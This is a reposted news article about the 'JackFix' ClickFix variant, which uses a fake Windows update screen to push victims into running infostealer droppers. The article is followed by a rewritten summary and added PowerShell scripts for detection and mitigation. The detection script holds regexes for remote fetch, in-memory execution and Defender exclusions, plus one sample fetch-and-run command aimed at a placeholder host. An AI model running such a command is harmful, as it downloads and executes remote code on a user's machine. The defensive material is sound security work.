LmCast :: Stay tuned in

'JackFix' Attack Circumvents ClickFix Mitigations

Recorded: Nov. 25, 2025, 4:02 p.m.


A new ClickFix variant ratchets up the psychological pressure to 100 and addresses some technical mitigations to classic ClickFix attacks.

Nate Nelson, Contributing Writer
November 25, 2025 | 4 Min Read
Source: NorthScape via Alamy Stock Photo

A new spin on the ClickFix attack is making the rounds, and it's designed to circumvent some of the strategies organizations have for mitigating such attacks.

ClickFix and its slightly more elegant offshoot, FileFix, are notorious for being almost inexplicably manipulative. Attackers persuade victims to run commands on their computers that they never otherwise would, and may never have before.

Now there's a new variant, dubbed "JackFix," that gives more logical context to the strange actions victims are made to perform. JackFix ratchets up the psychological trickery to 100, with an anxiety-inducing phishing lure and an old-fashioned screen lock. And it has a few simple technical tricks for duping security solutions, too.

The result: hundreds of reports of JackFix have been pouring into VirusTotal — "much higher than other [ClickFix] campaigns we've seen recently," reports Acronis senior security researcher Eliad Kimhy. Those reports have largely been concentrated in the US, but also span across Europe.

The JackFix Phishing Lure

In the traditional ClickFix attack, victims are presented with some kind of fake technical issue. This does give context to the task they have to fulfill — copying and pasting code they don't understand into the Windows Run dialog — but it doesn't necessarily get the heart racing.

To really capture victims' attention and help them forget their better instincts, the seemingly Russian-speaking cybercriminals behind JackFix pulled from the old hacker playbook.

Through malvertising or some other means of phishing, victims are drawn to fake versions of popular pornography sites. As soon as they interact with the page, they're hit with a Windows blue screen. The screen is fake, but it does a solid job of recreating a real critical Windows update: it consumes the entire screen, and includes both a fake progress counter and the loading animation of dots traveling in a circle. Certain keyboard shortcuts are also blocked to prevent users from escaping.

For Kimhy, it recalls those sweat-inducing ransomware attacks of old. "Back in the early days of ransomware, attackers had figured out there is no need to completely ransom a computer's files, when you could just lock the screen and try to convince the victim to send you money," he wrote. A panicked user may be more likely to perform actions they're not used to — like running malicious commands in the Run dialog — and the format can be taken in any number of creative directions, Kimhy noted, which "may turn out to be far more compelling and flexible than a traditional ClickFix attack."

How JackFix Circumvents Security Protections

Even if the human victim of a ClickFix attack gets wrapped up in the ruse, there are plenty of ways security programs can pick up the slack.

For instance, in a typical ClickFix attack, a website copies malicious code to the user's clipboard, then instructs them on how to run it. In theory, string- or pattern-based rules might catch the scripts that handle copying to the clipboard, and the known malicious actions that the victim runs on their machine. So JackFix encodes into an array both the JavaScript used for copying to the clipboard and the malicious commands the user is supposed to run, and only reconstructs them at runtime, in memory.

Or say a victim runs an attacker's code in the Run dialog, and the code invokes a URL where some malware lies. Any number of network security protections might detect traffic to a known malicious URL and block it. To get around this, JackFix's URL performs content-based filtering, splitting incoming traffic into two groups. If a visitor reaches the site directly, it automatically redirects them to a benign website, like Google or Steam. Only when the site is reached through the JackFix attack flow does it reveal its true nature and serve malware. This makes the site more difficult to analyze and less likely to be tagged by threat intelligence tools, and thus it largely avoids being flagged as malicious by programs that see it along the attack chain.

The PowerShell script downloaded from that URL is large and heavily obfuscated, with dead code and random variable names designed to defeat static analysis. It then prompts the user to grant it administrative privileges, and continues to pester them until they accept. After granting itself a variety of exclusions in Microsoft Defender, the script recruits a flurry of up to eight separate commercial malware samples. These include some of the most popular infostealers in the cyber underground — Rhadamanthys, Vidar 2.0, RedLine, and Amadey — plus a series of loaders. Acronis characterized it as "the most egregious example of spray and pray we've ever seen."

In the end, there are ClickFix mitigations that JackFix doesn't address. For example, organizations can address all ClickFix variants by simply disabling Windows Run for certain employees that don't need it, using Group Policy settings. Or, Kimhy adds, "if the organization can do anything to limit the browser's ability to make a page full screen, that could take a lot of sting out of this attack."

About the Author
Nate Nelson, Contributing Writer
Nate Nelson is a writer based in New York City. He formerly worked as a reporter at Threatpost, and wrote "Malicious Life," an award-winning Top 20 tech podcast on Apple and Spotify. Outside of Dark Reading, he also co-hosts "The Industrial Security Podcast."

The spread of ClickFix and FileFix attacks highlights a shift in cybercriminal tactics toward psychological manipulation combined with technical circumvention of existing defenses. The new variant, dubbed "JackFix," is a notably sophisticated evolution of these attacks, showing a better understanding both of defensive controls and of how to exploit human behavior. As detailed by Acronis senior security researcher Eliad Kimhy, JackFix combines several elements that set it apart from earlier iterations. First, it applies layered psychological pressure: a convincing fake Windows blue screen, presented as a critical update in progress, is paired with a lure designed to induce panic and urgency. Because the ruse draws on the familiar, unsettling experience of a Windows system error, it pushes victims past the rational scrutiny that conventional defenses rely on, and the simulated update makes the attacker's instructions look like the normal response to a legitimate system alert.

The technical side of JackFix is equally noteworthy. Anticipating that string- or pattern-based detection might catch the clipboard-copying script or the known malicious commands, the attackers encode both the JavaScript used for clipboard manipulation and the commands the victim is told to run inside an array, and reconstruct them only at runtime, in memory. That defeats static pattern matching on the page and raises the bar for detection. The payload URL that the victim's command contacts also applies content-based filtering: a visitor who reaches it directly is redirected to a benign site such as Google or Steam, and the malware is served only when the request arrives through the JackFix attack flow. This makes the site harder to analyze and less likely to be tagged by threat intelligence tools that rely on identifying known malicious URLs.

Beyond these evasions, JackFix uses a "spray and pray" approach: a large, heavily obfuscated PowerShell script, padded with dead code and random variable names to defeat static analysis, prompts the user for administrative privileges, adds exclusions in Microsoft Defender, and then deploys up to eight commercial malware samples. These include widely used infostealers (Rhadamanthys, Vidar 2.0, RedLine, and Amadey) plus several loaders, an attempt to maximize the impact of each infection. Acronis characterized it as "the most egregious example of spray and pray we've ever seen," underscoring the volume and indiscriminate nature of the deployment.
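The array obfuscation and the cloaked payload URL described above, and in the original article, defeat static matching on the page and on the URL, but the launch itself still leaves a trace: an interpreter started from the Run dialog with a command line that fetches and executes remote content, hides its window, or adds Defender exclusions. The following PowerShell is an added example, not code from the article or from Acronis, of a triage heuristic over process-creation records; the field names follow Sysmon Event ID 1, the function name is my own, and the sample events are constructed.

```powershell
# Added example: heuristic for the ClickFix/JackFix launch pattern, i.e. a script
# interpreter started from the Run dialog (parent explorer.exe) whose command line
# fetches a URL, hides its window, decodes a payload, executes in memory, or adds
# Microsoft Defender exclusions. Field names follow Sysmon Event ID 1.
$Interpreters = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe')

# Regexes are case-insensitive under -match; Label is what the analyst sees.
$Indicators = @(
    @{ Label = 'remote fetch';       Pattern = 'https?://|Invoke-WebRequest|\biwr\b|\bcurl\b|DownloadString' }
    @{ Label = 'hidden window';      Pattern = '-w(indowstyle)?\s+hidden' }
    @{ Label = 'policy bypass';      Pattern = '-ep\s+bypass|-ExecutionPolicy\s+Bypass|-nop\b' }
    @{ Label = 'encoded command';    Pattern = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Label = 'in-memory exec';     Pattern = '\biex\b|Invoke-Expression' }
    @{ Label = 'Defender exclusion'; Pattern = 'Add-MpPreference|Set-MpPreference' }
)

function Test-ClickFixLaunch {
    # Returns a finding object for a suspicious event, or $null for a benign one.
    param([Parameter(Mandatory)] [hashtable] $Event)
    $image  = [IO.Path]::GetFileName($Event.Image).ToLower()
    $parent = [IO.Path]::GetFileName($Event.ParentImage).ToLower()
    if ($Interpreters -notcontains $image) { return $null }
    $hits = @(foreach ($i in $Indicators) { if ($Event.CommandLine -match $i.Pattern) { $i.Label } })
    # explorer.exe is the parent of every Run-dialog launch, so on its own it is
    # not suspicious; require at least one command-line indicator as well.
    if ($parent -ne 'explorer.exe' -or $hits.Count -eq 0) { return $null }
    [pscustomobject]@{ Image = $image; Parent = $parent; Indicators = ($hits -join ', '); CommandLine = $Event.CommandLine }
}

# Constructed sample events (not real telemetry): a benign Run-dialog launch, a
# scheduled benign script, and a ClickFix-style launch with a placeholder URL.
$Samples = @(
    @{ Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'notepad.exe' }
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\svchost.exe'; CommandLine = 'powershell.exe -File C:\Scripts\backup.ps1' }
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'powershell -w hidden -c "iex (iwr http://PLACEHOLDER.invalid/u)"' }
)
$Samples | ForEach-Object { Test-ClickFixLaunch $_ } | Format-Table -AutoSize
# On a Sysmon-equipped host, feed real events instead, e.g. from
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
```

Only the third sample is reported (remote fetch, hidden window, in-memory exec); the benign Run-dialog launch and the scheduler-spawned script are not.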

Despite the evasions the attackers employ, several existing mitigations remain viable. Organizations can address all ClickFix variants by disabling Windows Run for employees who do not need it, enforcing the restriction via Group Policy. Limiting the browser's ability to make a page full screen would also take much of the sting out of the blue-screen ruse. Attacks like JackFix nonetheless call for a proactive, layered approach: defenses must be adapted quickly as the threat landscape changes, and continuous monitoring remains essential. JackFix also shows that the human element must be recognized in a security strategy alongside technical controls.
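The two mitigations above (disable the Run dialog via Group Policy; stop the browser from going full screen) map to well-known policy values, and the following PowerShell is an added example, not from the article, that audits and applies them as local registry policy on a test host. It assumes Chrome and Edge are the managed browsers; the function names are my own.

```powershell
# Added example: audit and apply the two ClickFix mitigations as local registry
# policy on a lab/test host. In production the same values come from GPO or Intune:
#   NoRun = 1 is the "Remove Run menu from Start Menu" setting (User Configuration >
#     Administrative Templates > Start Menu and Taskbar) and removes the Run dialog.
#   FullscreenAllowed = 0 is the Chrome/Edge enterprise policy that stops a page
#     from entering full-screen mode, which blunts the fake blue screen.
# Caveat: NoRun covers only the Run dialog, not other launch points such as the
# File Explorer address bar, and the browser policy must cover every browser in use.
$Policies = @(
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoRun';             Value = 1 }
    @{ Path = 'HKLM:\Software\Policies\Google\Chrome';                              Name = 'FullscreenAllowed'; Value = 0 }
    @{ Path = 'HKLM:\Software\Policies\Microsoft\Edge';                             Name = 'FullscreenAllowed'; Value = 0 }
)

function Get-ClickFixMitigationState {
    # Reports each policy's current value so drift from the expected setting is visible.
    foreach ($p in $Policies) {
        $current = (Get-ItemProperty -Path $p.Path -Name $p.Name -ErrorAction SilentlyContinue).($p.Name)
        $shown   = if ($null -eq $current) { '(not set)' } else { $current }
        [pscustomobject]@{
            Policy   = "$($p.Path)\$($p.Name)"
            Expected = $p.Value
            Current  = $shown
            Enforced = ($current -eq $p.Value)
        }
    }
}

function Set-ClickFixMitigations {
    # Writes the values; the HKLM entries need an elevated session. -WhatIf previews only.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($p in $Policies) {
        if ($PSCmdlet.ShouldProcess("$($p.Path)\$($p.Name)", "Set DWORD to $($p.Value)")) {
            if (-not (Test-Path $p.Path)) { New-Item -Path $p.Path -Force | Out-Null }
            Set-ItemProperty -Path $p.Path -Name $p.Name -Value $p.Value -Type DWord
        }
    }
}

Set-ClickFixMitigations -WhatIf      # drop -WhatIf to apply
Get-ClickFixMitigationState | Format-Table -AutoSize
```

The audit function is the useful part on a domain-joined machine: if Group Policy is delivering these settings, each row should show Enforced = True without running the setter at all.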